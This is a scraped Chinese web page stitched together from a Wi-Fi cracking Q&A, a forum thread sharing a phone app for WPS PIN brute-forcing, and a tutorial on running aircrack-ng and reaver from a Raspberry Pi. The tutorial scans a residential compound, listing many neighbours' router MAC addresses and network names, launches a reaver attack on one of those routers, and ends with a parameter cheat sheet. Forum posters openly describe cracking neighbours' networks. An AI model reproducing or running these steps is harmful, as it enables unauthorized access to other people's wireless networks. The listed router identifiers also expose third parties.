PIN码免跑包无线路由器MAC对应PIN码表 直接PIN码破解WPA WPA2无线密码无..
扫扫二维码，随身浏览文档
手机或平板扫扫即可继续访问
PIN码免跑包无线路由器MAC对应PIN码表 直接PIN码破解WPA WPA2无线密码
举报该文档为侵权文档。
举报该文档含有违规或不良信息。
反馈该文档无法正常浏览。
举报该文档为重复文档。
推荐理由：
将文档分享至：
分享完整地址
文档地址：
粘贴到BBS或博客
flash地址：
支持嵌入FLASH地址的网站使用
html代码：
&embed src='/DocinViewer-4.swf' width='100%' height='600' type=application/x-shockwave-flash ALLOWFULLSCREEN='true' ALLOWSCRIPTACCESS='always'&&/embed&
450px*300px480px*400px650px*490px
支持嵌入HTML代码的网站使用
您的内容已经提交成功
您所提交的内容需要审核后才能发布，请您等待！
3秒自动关闭窗口有没有不用抓包，直接用字典中的密码连路由的软件（不是PIN）
- 随时随地无线！
有没有不用抓包，直接用字典中的密码连路由的软件（不是PIN）
如题：有没有不用抓包，直接用字典中的密码连路由的软件（不是PIN）？
不区分大小写匿名
除非你手动导入字典，并且字典很NB，你人品又很好，对方设置的密码简单，不是金刚包
万能钥匙，超弱的密码可能话说可能吗，8位纯数字有上亿可能，就算路由器不保护，让你连，一次起码要几秒才能返回密码信息（正确或者错误）你要连直接连多久才能连完1个字典
看来手机上用的“幻影WIFI”只是个摆设。
呵呵，楼主你想的可真美啊
那WiFi密码就成了摆设了
呵呵，也许会管用啊
你自己想想。。。。假如你的电脑跑包3w的速度，跑一个1g的字典要多久？？？而你直接用密码连，返回信息的时间假如为1秒。。。。这个方法不是没有，而是效率问题。。。。假如跑包3万的速度用了。100秒出密码，那就总共跑了300万个密码。。。。而你一个一个尝试连接300万个密码，就是用300万秒。那得多久？？？。。况且路由器经过这样大量的连接受的住？？？？受的住也跟mdk3攻击差不多了。。反应迟钝，掉线。。
用pin的方法。。。最多也就是1万1千个码。。。。假如每个码5秒。。。那总共也5万5千秒。。。如果pin码的位置靠前更快。。。
相关知识等待您来回答
该问题来自：中国最大最专业的无线网络社区门户！手机领域专家
当前分类官方群讨论、解答、交流电脑数码相关的疑难问题后使用快捷导航没有帐号？
后使用快捷导航没有帐号？
查看: 1220|回复: 18
少尉, 积分 322, 距离下一级还需 179 积分
签到天数: 20 天[LV.4]偶尔看看III
本帖最后由 妳、是俄滴唯一_ 于
11:47 编辑
下载地址& && && && && && && && && &
以前那个基于reaver 要bcm网卡
这个不许要特定网卡
把WLAN改成始终链接&&然后锁屏就可以了 WIFI PJ省电费
好用就给分啊&&
自己测试速度还不错 3 s/pin 左右
用自己家路由器测试了一下 可以PIN 出密码
使用教程&&
建议把错误重试时间改成 4秒&&否则很容易PIN死
友情提示：请文明蹭网，幻影系列软件仅供个人用户学习之用，软件版权属于幻影所有，盗版必究，请勿在作者未经允许的情况下进行商业用途，产生的法律及相关问题责任由使用人自行负责，谢谢理解与支持！
& &&&& && && &
少校, 积分 2445, 距离下一级还需 2556 积分
签到天数: 168 天[LV.7]常住居民III
手机上Anywlan 随时随地无线:
虽说幻影作者是高中生，实属不易。。。但是没有技术上的突破，不用reaver核心，但还是一样pin的原理。。只是驱动上有进步。。只是没人去完善reaver的驱动而已。。不管什么核心，重要的都是驱动。。就像你电脑是什么系统，显卡驱动都是官网下的，不管你什么网卡，U盘启动差cdlinux不多都能认出网卡。。所以只要有人完善reaver的驱动，希望可以和幻影一样。。。幻影估计很难出现电脑版，即使有也要用外置网卡，因为windows根本就不开源，你拿不到核心权限。。就像你的手机无法root一样没权限
少尉, 积分 322, 距离下一级还需 179 积分
签到天数: 20 天[LV.4]偶尔看看III
为什么我的手机老提示驱动在但是失败？模式1到15我都试过，同样的问题。怎么办？
官方说换root 或者刷机。。。。。 我也不知道我用模式一
少校, 积分 2445, 距离下一级还需 2556 积分
签到天数: 168 天[LV.7]常住居民III
手机上Anywlan 随时随地无线:
感觉还可以，不过我的手机支持reaver，所以我也不想用，主要是驱动太麻烦了。。整来整去。。有时候还驱动失败。。也不觉得比reaver好到哪里去，甚至速度还不如reaver，手机pin的好是因为信号稳定，手机信号很稳定不虚高
新兵上阵, 积分 29, 距离下一级还需 52 积分
该用户从未签到
为什么我的手机老提示驱动在但是失败？模式1到15我都试过，同样的问题。怎么办？
少尉, 积分 322, 距离下一级还需 179 积分
签到天数: 20 天[LV.4]偶尔看看III
为什么我的手机老提示驱动在但是失败？模式1到15我都试过，同样的问题。怎么办？
少校, 积分 3439, 距离下一级还需 1562 积分
签到天数: 287 天[LV.8]以坛为家I
我是过这玩意。不好用啊
少校, 积分 2370, 距离下一级还需 2631 积分
签到天数: 264 天[LV.8]以坛为家I
比用电脑加特定的网卡PIN还爽！可以直接拿手机到东家的窗下强信号处PJ。
大校, 积分 28106, 距离下一级还需 11895 积分
签到天数: 308 天[LV.8]以坛为家I
谢谢楼主分享
麦克一帖先
上尉, 积分 1234, 距离下一级还需 767 积分
签到天数: 22 天[LV.4]偶尔看看III
手机上Anywlan 随时随地无线:
软件不错 奈何周围全是防pin的 命苦啊
少尉, 积分 276, 距离下一级还需 225 积分
签到天数: 4 天[LV.2]偶尔看看I
不好意思，极慢
少校, 积分 4163, 距离下一级还需 838 积分
签到天数: 434 天[LV.9]以坛为家II
半年没来了，现在高手不少啊，手机也步入pin的旅途咯
少尉, 积分 322, 距离下一级还需 179 积分
签到天数: 20 天[LV.4]偶尔看看III
软件不错 奈何周围全是防pin的 命苦啊
信号不好吧
上校, 积分 14066, 距离下一级还需 5935 积分
签到天数: 475 天[LV.9]以坛为家II
2个月前我手机上就有了 这还叫最新发现
Powered by你的位置： > aircrack和reaver破解路由器PIN码
小编：感谢minyoni的分享，freebuf希望这种从安装到测试全过程的paper越来越多，让国内paper与国外一样细致和专业。
声明：本文仅供学习用途
最近心血来潮，想把小区里的无线信号测试个遍。基于目前大多数路由器都,想必各位基友们都知道aircrack和reaver这两个，实属pin码，杀人越货，居家旅行之必备良药。像以前跑reaver这样的暴力一般都要24小时开着主机，实在浪费功耗，灰常的不绿色！不环保！ 话说Rberry Pi，作为一个环境也是灰常给力的。国外的发烧友们已经针对这个板子，改造了专门用于网络攻击和测试的系统（基于debian）
不过今天这篇文章说的是如何在Rberry Pi的官方发行版上安装 aircrack和reaver ，我用的是充电器+Mini usb 线给Raspberry Pi供电，带一个alfa的无线网卡足够了。功耗如此之低，实在是在线跑pin码。长期无线抓的绝佳方案呢。
PS:懂得可以路过了&&
废话不多说，安装过程如下
1.准备系统环境
apt- install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion
2.安装aircrack
svn co trac.aircrack-ng.org/svn/trunk aircrack-ng
cd aircrack-ng/
make install
3.安装reaver
w reaver-./s/reaver-1.4.tar.gz
tar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make install
4.使用 aircrack，寻找附近开启的路由器，邪恶&&嘻嘻
airmon-ng start wlan0
airodump-ng mon0
CH 11 ][ Elapsed: 36 s ][
#Data, #/s
CIPHER AUTH ESSID
00:0E:2E:FD:C4:BB
4C:E6:76:60:3F:20
B0:48:7A:52:F4:72
54e. WPA2 CCMP
FAST_52F472
8C:21:0A:5F:A2:FA
54e. WPA2 CCMP
TP-LINK_5FA2FA
E0:05:C5:D3:3F:00
54e. WPA2 CCMP
TP-LINK_D33F00
EC:17:2F:7D:12:1E
54e. WPA2 CCMP
B0:48:7A:5D:22:EA
54e. WPA2 CCMP
TP-LINK_1202
C4:CA:D9:6D:6F:B0
8C:21:0A:8F:2F:1A
54e. WPA2 CCMP
E0:05:C5:C5:70:E8
54e. WPA2 CCMP
C8:3A:35:55:D1:D8
Tenda_55D1D8
8C:21:0A:84:89:8C
54e. WPA2 CCMP
C4:CA:D9:6D:5F:60
EC:17:2F:54:01:2E
54e. WPA2 CCMP
diguadawang
5C:63:BF:74:56:52
54e. WPA2 CCMP
08:10:76:40:C2:92
E0:05:C5:C0:60:42
54e. WPA2 CCMP
38:83:45:C1:BE:F8
54e. WPA2 CCMP
TICO081122
C4:CA:D9:74:B3:80
EC:88:8F:AB:F6:5E
54e. WPA2 CCMP
TP-LINK_ABF65E
6C:E8:73:B0:67:78
54e. WPA2 CCMP
WJJ~LOVE~WW
C8:3A:35:19:D6:78
Tenda_19D678
E0:05:C5:19:9C:04
54 . WPA2 CCMP
1-14-1-602
C8:64:C7:5A:46:16
6C:E8:73:45:A7:E6
54e. WPA2 CCMP
TP-LINK_45A7E6
1C:BD:B9:F5:E5:D7
D-Link_DIR-600M
C4:CA:D9:6D:6E:B0
C8:64:C7:5A:46:15
VIDEOPHONE_CDCF
C8:64:C7:5A:46:17
EC:88:8F:99:75:F2
54e. WPA2 CCMP
8C:21:0A:1E:60:26
54e. WPA2 CCMP
00:23:CD:5B:A7:9E
1203 wireless
14:E6:E4:44:9B:8E
54e. WPA2 CCMP
00:1D:0F:81:72:06
FC:C8:97:94:B6:C8
B0:48:7A:2A:1B:E6
EC:88:8F:8F:CD:BB
54e. WPA2 CCMP
EC:17:2F:AC:44:A2
54e. WPA2 CCMP
C8:64:C7:5A:46:14
38:83:45:B5:E3:96
54e. WPA2 CCMP
TP-LINK_B5E396
C8:3A:35:2B:35:68
Tenda_2B3568
00:27:19:6D:4A:5A
54e. WPA2 CCMP
JUJIA-FOGUANG
FC:C8:97:94:B6:CB
FC:C8:97:94:B6:C9
VIDEOPHONE_6cmn
C8:3A:35:06:63:B0
Tenda_0663B0
8C:21:0A:B0:22:92
54e. WPA2 CCMP
14:E6:E4:4F:DE:FE
54e. WPA2 CCMP
FC:C8:97:94:B6:CA
C8:3A:35:52:70:60
Tenda_527060
00:26:5A:B3:08:7E
F4:EC:38:56:6B:DE
54e. WPA2 CCMP
14:D6:4D:A0:19:60
C4:CA:D9:6D:6F:40
ctrl+c^ &结束
话说小区里的无线信号还真是多呢&&主要是alfa 的卡给力&&呵呵
5.使用reaver 开启wps功能的路由器
比如这条，信号还不错
8C:21:0A:5F:A2:FA -35 28 0 0 1 54e. WPA2 CCMP PSK TP-LINK_5FA2FA
root@home:~/soft/reaver-1.4#
-b 8C:21:0A:5F:A2:FA
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner &&
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 8C:21:0A:5F:A2:FA
[+] Associated with 8C:21:0A:5F:A2:FA (ESSID: TP-LINK_5FA2FA)
[+] Trying pin
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
这样就开始破解了哦，耐心等待结果就好了&&不要太邪恶哦。做做测试还是可以的，要做个好童鞋&&
##########################################################################
附上reaver调整参数的一些小 reaver:
-i 监听后接口名称
-b mac地址
-a 自动检测AP最佳配置
-S 使用最小的DH key（可以提高PJ速度）
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间
-c指定频道可以方便找到信号，如-c1 指定1频道，大家查看自己的目标频道做相应修改 （非TP-LINK路由推荐&d9 &t9参数防止路由僵死
reaver -i mon0 -b
-a -S &d9 &t9 -vv）
应因状况调整参数（-c后面都已目标频道为1作为例子）
目标信号非常好: reaver -i mon0 -b
-a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
载请注明： &
与本文相关的文章
暂无相关文章！